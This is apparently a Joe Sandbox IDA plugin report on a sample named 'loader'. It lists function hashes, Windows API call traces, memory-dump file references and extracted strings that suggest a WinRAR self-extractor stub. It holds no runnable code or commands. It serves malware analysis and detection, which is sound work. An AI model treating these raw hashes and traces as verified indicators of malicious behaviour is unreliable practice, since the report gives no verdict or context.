              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID: ^PpL
              • API String ID: 0-914357616
              • Opcode ID: 2944a1521fcc35d65a607c397d6634abf7cf44fe07ebdf76d6fd9e50af570ce4
              • Instruction ID: 50a4b600d5727e866efd60617b97492fe4721bcd4136410aa9861d2aeb5e5329
              • Opcode Fuzzy Hash: 2944a1521fcc35d65a607c397d6634abf7cf44fe07ebdf76d6fd9e50af570ce4
              • Instruction Fuzzy Hash: B7617871680B3897DE389A28B895BBF2394EB59704F100A1AE883DB2C1D751DDB2C75D
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: HeapProcess
              • String ID:
              • API String ID: 54951025-0
              • Opcode ID: ba8f60fa38e8f8d8d207dacf31d7f12c0cb9fd5aba0c8551c6aefb83aa5c0fb3
              • Instruction ID: 1f21b105a80d0c856ba72fb779b60f8decbf2678e18f75251771b481ed4df59a
              • Opcode Fuzzy Hash: ba8f60fa38e8f8d8d207dacf31d7f12c0cb9fd5aba0c8551c6aefb83aa5c0fb3
              • Instruction Fuzzy Hash: 09A001B86052019BD7408F76AE092093AA9AB456917098269A51AC6960EAA885A09F45
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
              • Instruction ID: 546676884ac6ea416604c4fb052f52b593bed25d0f44d034343c46e97fd9d7d1
              • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
              • Instruction Fuzzy Hash: F562E671604B859FCB2DCF28C8906F9BBE2AF95304F04857DD8AA8B746D735E985CB10
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
              • Instruction ID: a95146082316595117c6642828766cbd09ed6e731a6cf7a5e22fc2a155c30550
              • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
              • Instruction Fuzzy Hash: 4062CE7160874A9FC71DCF28C8905F9BBB1BB55304F14867EE8A687782D730E996CB90
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
              • Instruction ID: f4ee48ee34f9d40ccc3e9b3f11b8de201407d695e0607012356b4a6b7919073b
              • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
              • Instruction Fuzzy Hash: 02523AB26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA19CB86
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1edf193618d2bd6bfe18e57fb85fe78748a1b23b39a470f0517b0a1faa7eba05
              • Instruction ID: a07fec6686fb1cbc297c47b1f9123ef682d0ef07038fa61d656ad91a0774da1a
              • Opcode Fuzzy Hash: 1edf193618d2bd6bfe18e57fb85fe78748a1b23b39a470f0517b0a1faa7eba05
              • Instruction Fuzzy Hash: 7B12AEB16047068BC72CCF28D9906B9B3E0FF58308F14893EE597C7A85D775A895CB45
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1c8dea7ad5f537cff7882de0b9680d986c580eed0430fa3ce86ae998f3663a65
              • Instruction ID: 4e8538d5a01dfdb8281fc49a9f0e7cfc6801f2128b7781d2859bc714754b4edc
              • Opcode Fuzzy Hash: 1c8dea7ad5f537cff7882de0b9680d986c580eed0430fa3ce86ae998f3663a65
              • Instruction Fuzzy Hash: 7DF166756083018FC718CF29C48496ABBE2FF99314F148A2EF4D597296D7B0E945CF92
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction ID: 9d3c64e45a46cc4f025e3548eceb9a2e5d31c881efdf587b49da2396016c4133
              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction Fuzzy Hash: FBC1947A2150B30ADF2E8639A53403FFAA15AA67B131A075DD4F2CB1D6FF20D574DA10
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction ID: 1fb6794d5118ee97e1f3350e52da47f229f4e74bdd81397481a726d9c29b5abe
              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction Fuzzy Hash: 07C1853A2151B30ADF2EC639953413FBAA25AA27B131A076DE4F2CB1C5FF20D574D620
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
              • Instruction ID: 0de420954ead653c52dd9aac3976b1fb7743494f0b37903b8e06618505381604
              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
              • Instruction Fuzzy Hash: A1C1733A2051B30ADF2E8639A57403FBAA15AA57B131A076DD4F3CB1C6FF10D574DA20
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              APIs
              • _swprintf.LIBCMT ref: 0010DABE
                • Part of subcall function 0010400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0010401D
                • Part of subcall function 00111596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00140EE8,00000200,0010D202,00000000,?,00000050,00140EE8), ref: 001115B3
              • _strlen.LIBCMT ref: 0010DADF
              • SetDlgItemTextW.USER32(?,0013E154,?), ref: 0010DB3F
              • GetWindowRect.USER32(?,?), ref: 0010DB79
              • GetClientRect.USER32(?,?), ref: 0010DB85
              • GetWindowLongW.USER32(?,000000F0), ref: 0010DC25
              • GetWindowRect.USER32(?,?), ref: 0010DC52
              • SetWindowTextW.USER32(?,?), ref: 0010DC95
              • GetSystemMetrics.USER32(00000008), ref: 0010DC9D
              • GetWindow.USER32(?,00000005), ref: 0010DCA8
              • GetWindowRect.USER32(00000000,?), ref: 0010DCD5
              • GetWindow.USER32(00000000,00000002), ref: 0010DD47
              Strings
              Similarity
              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
              • String ID: $%s:$CAPTION$d
              • API String ID: 2407758923-2512411981
              APIs
              • ___free_lconv_mon.LIBCMT ref: 0012C277
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE2F
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE41
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE53
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE65
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE77
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE89
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BE9B
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BEAD
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BEBF
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BED1
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BEE3
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BEF5
                • Part of subcall function 0012BE12: _free.LIBCMT ref: 0012BF07
              • _free.LIBCMT ref: 0012C26C
                • Part of subcall function 001284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?), ref: 001284F4
                • Part of subcall function 001284DE: GetLastError.KERNEL32(?,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?,?), ref: 00128506
              • _free.LIBCMT ref: 0012C28E
              • _free.LIBCMT ref: 0012C2A3
              • _free.LIBCMT ref: 0012C2AE
              • _free.LIBCMT ref: 0012C2D0
              • _free.LIBCMT ref: 0012C2E3
              • _free.LIBCMT ref: 0012C2F1
              • _free.LIBCMT ref: 0012C2FC
              • _free.LIBCMT ref: 0012C334
              • _free.LIBCMT ref: 0012C33B
              • _free.LIBCMT ref: 0012C358
              • _free.LIBCMT ref: 0012C370
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              APIs
              • GetWindow.USER32(?,00000005), ref: 0011CD51
              • GetClassNameW.USER32(00000000,?,00000800), ref: 0011CD7D
                • Part of subcall function 001117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0010BB05,00000000,.exe,?,?,00000800,?,?,001185DF,?), ref: 001117C2
              • GetWindowLongW.USER32(00000000,000000F0), ref: 0011CD99
              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0011CDB0
              • GetObjectW.GDI32(00000000,00000018,?), ref: 0011CDC4
              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0011CDED
              • DeleteObject.GDI32(00000000), ref: 0011CDF4
              • GetWindow.USER32(00000000,00000002), ref: 0011CDFD
              Strings
              Similarity
              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
              • String ID: STATIC
              • API String ID: 3820355801-1882779555
              APIs
              • _free.LIBCMT ref: 00128EC5
                • Part of subcall function 001284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?), ref: 001284F4
                • Part of subcall function 001284DE: GetLastError.KERNEL32(?,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?,?), ref: 00128506
              • _free.LIBCMT ref: 00128ED1
              • _free.LIBCMT ref: 00128EDC
              • _free.LIBCMT ref: 00128EE7
              • _free.LIBCMT ref: 00128EF2
              • _free.LIBCMT ref: 00128EFD
              • _free.LIBCMT ref: 00128F08
              • _free.LIBCMT ref: 00128F13
              • _free.LIBCMT ref: 00128F1E
              • _free.LIBCMT ref: 00128F2C
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              Similarity
              • API ID:
              • String ID: ;%u$x%u$xc%u
              • API String ID: 0-2277559157
              APIs
              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0012F5A2,?,00000000,?,00000000,00000000), ref: 0012EE6F
              • __fassign.LIBCMT ref: 0012EEEA
              • __fassign.LIBCMT ref: 0012EF05
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0012EF2B
              • WriteFile.KERNEL32(?,?,00000000,0012F5A2,00000000,?,?,?,?,?,?,?,?,?,0012F5A2,?), ref: 0012EF4A
              • WriteFile.KERNEL32(?,?,00000001,0012F5A2,00000000,?,?,?,?,?,?,?,?,?,0012F5A2,?), ref: 0012EF83
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID: ^PpL
              • API String ID: 1324828854-914357616
              APIs
                • Part of subcall function 0010130B: GetDlgItem.USER32(00000000,00003021), ref: 0010134F
                • Part of subcall function 0010130B: SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              • EndDialog.USER32(?,00000001), ref: 0011AD20
              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0011AD47
              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0011AD60
              • SetWindowTextW.USER32(?,?), ref: 0011AD71
              • GetDlgItem.USER32(?,00000065), ref: 0011AD7A
              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0011AD8E
              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0011ADA4
              Similarity
              • API ID: MessageSend$Item$TextWindow$Dialog
              • String ID: LICENSEDLG
              • API String ID: 3214253823-2177901306
              APIs
              • __EH_prolog.LIBCMT ref: 00109448
              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0010946B
              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0010948A
                • Part of subcall function 001117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0010BB05,00000000,.exe,?,?,00000800,?,?,001185DF,?), ref: 001117C2
              • _swprintf.LIBCMT ref: 00109526
                • Part of subcall function 0010400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0010401D
              • MoveFileW.KERNEL32(?,?), ref: 00109595
              • MoveFileW.KERNEL32(?,?), ref: 001095D5
              Similarity
              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
              • String ID: rtmp%d
              • API String ID: 2111052971-3303766350
              APIs
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00118F38
              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00118F59
              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00118F80
              Similarity
              • API ID: Global$AllocByteCharCreateMultiStreamWide
              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
              • API String ID: 4094277203-4209811716
              APIs
              • __aulldiv.LIBCMT ref: 00110A9D
                • Part of subcall function 0010ACF5: GetVersionExW.KERNEL32(?), ref: 0010AD1A
              • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00110AC0
              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00110AD2
              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00110AE3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00110AF3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00110B03
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00110B3D
              • __aullrem.LIBCMT ref: 00110BCB
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
              • String ID:
              • API String ID: 1247370737-0
              APIs
              • GetTempPathW.KERNEL32(00000800,?), ref: 0011C54A
              • _swprintf.LIBCMT ref: 0011C57E
                • Part of subcall function 0010400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0010401D
              • SetDlgItemTextW.USER32(?,00000066,0014946A), ref: 0011C59E
              • _wcschr.LIBVCRUNTIME ref: 0011C5D1
              • EndDialog.USER32(?,00000001), ref: 0011C6B2
              Similarity
              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
              • String ID: %s%s%u
              • API String ID: 2892007947-1360425832
              Similarity
              • API ID: _free
              • String ID: ^PpL
              • API String ID: 269201875-914357616
              APIs
              • ShowWindow.USER32(?,00000000), ref: 0011964E
              • GetWindowRect.USER32(?,00000000), ref: 00119693
              • ShowWindow.USER32(?,00000005,00000000), ref: 0011972A
              • SetWindowTextW.USER32(?,00000000), ref: 00119732
              • ShowWindow.USER32(00000000,00000005), ref: 00119748
              Similarity
              • API ID: Window$Show$RectText
              • String ID: RarHtmlClassName
              • API String ID: 3937224194-1658105358
              APIs
                • Part of subcall function 0012BF79: _free.LIBCMT ref: 0012BFA2
              • _free.LIBCMT ref: 0012C003
                • Part of subcall function 001284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?), ref: 001284F4
                • Part of subcall function 001284DE: GetLastError.KERNEL32(?,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?,?), ref: 00128506
              • _free.LIBCMT ref: 0012C00E
              • _free.LIBCMT ref: 0012C019
              • _free.LIBCMT ref: 0012C06D
              • _free.LIBCMT ref: 0012C078
              • _free.LIBCMT ref: 0012C083
              • _free.LIBCMT ref: 0012C08E
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              APIs
              • GetLastError.KERNEL32(?,?,001220C1,0011FB12), ref: 001220D8
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001220E6
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001220FF
              • SetLastError.KERNEL32(00000000,?,001220C1,0011FB12), ref: 00122151
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              Similarity
              • API ID:
              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
              • API String ID: 0-1718035505
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00127573,00000000,?,00127513,00000000,0013BAD8,0000000C,0012766A,00000000,00000002), ref: 001275E2
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001275F5
              • FreeLibrary.KERNEL32(00000000,?,?,?,00127573,00000000,?,00127513,00000000,0013BAD8,0000000C,0012766A,00000000,00000002), ref: 00127618
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$^PpL$mscoree.dll
              • API String ID: 4061214504-1742151727
              APIs
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00110D0D
                • Part of subcall function 0010ACF5: GetVersionExW.KERNEL32(?), ref: 0010AD1A
              • LocalFileTimeToFileTime.KERNEL32(?,00110CB8), ref: 00110D31
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00110D47
              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00110D56
              • SystemTimeToFileTime.KERNEL32(?,00110CB8), ref: 00110D64
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00110D72
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion
              • String ID:
              • API String ID: 2092733347-0
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: 2ec5cc5f63dd1cdf2cdd0c5f738421a739d71f73e4fd75ff5cc9c7ed2f9c7f45
              • Instruction ID: ff90ffd66e7aa89f7296b40a6691e45d50e8509bb4f1ab23b5c21abf6c751ead
              • Opcode Fuzzy Hash: 2ec5cc5f63dd1cdf2cdd0c5f738421a739d71f73e4fd75ff5cc9c7ed2f9c7f45
              • Instruction Fuzzy Hash: AB21A47160420EBBDB0C9E14DC91EBB77ADEB60B94F108138FC199B201E370EDC69692
              APIs
              • GetLastError.KERNEL32(?,00140EE8,00123E14,00140EE8,?,?,00123713,00000050,?,00140EE8,00000200), ref: 00128FA9
              • _free.LIBCMT ref: 00128FDC
              • _free.LIBCMT ref: 00129004
              • SetLastError.KERNEL32(00000000,?,00140EE8,00000200), ref: 00129011
              • SetLastError.KERNEL32(00000000,?,00140EE8,00000200), ref: 0012901D
              • _abort.LIBCMT ref: 00129023
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: 730986553ad35289d1582918e64c410768a839027a69e137231a9ce49576107b
              • Instruction ID: bc18d5597c50cafaeccf404ab796a49b3d8687e5046d3a1704f62495238a0543
              • Opcode Fuzzy Hash: 730986553ad35289d1582918e64c410768a839027a69e137231a9ce49576107b
              • Instruction Fuzzy Hash: A7F028715066316BD315332D7D0AF2B2A5A9FE0760F250018F524E26D2EF20CD715118
              APIs
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0011D2F2
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0011D30C
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0011D31D
              • TranslateMessage.USER32(?), ref: 0011D327
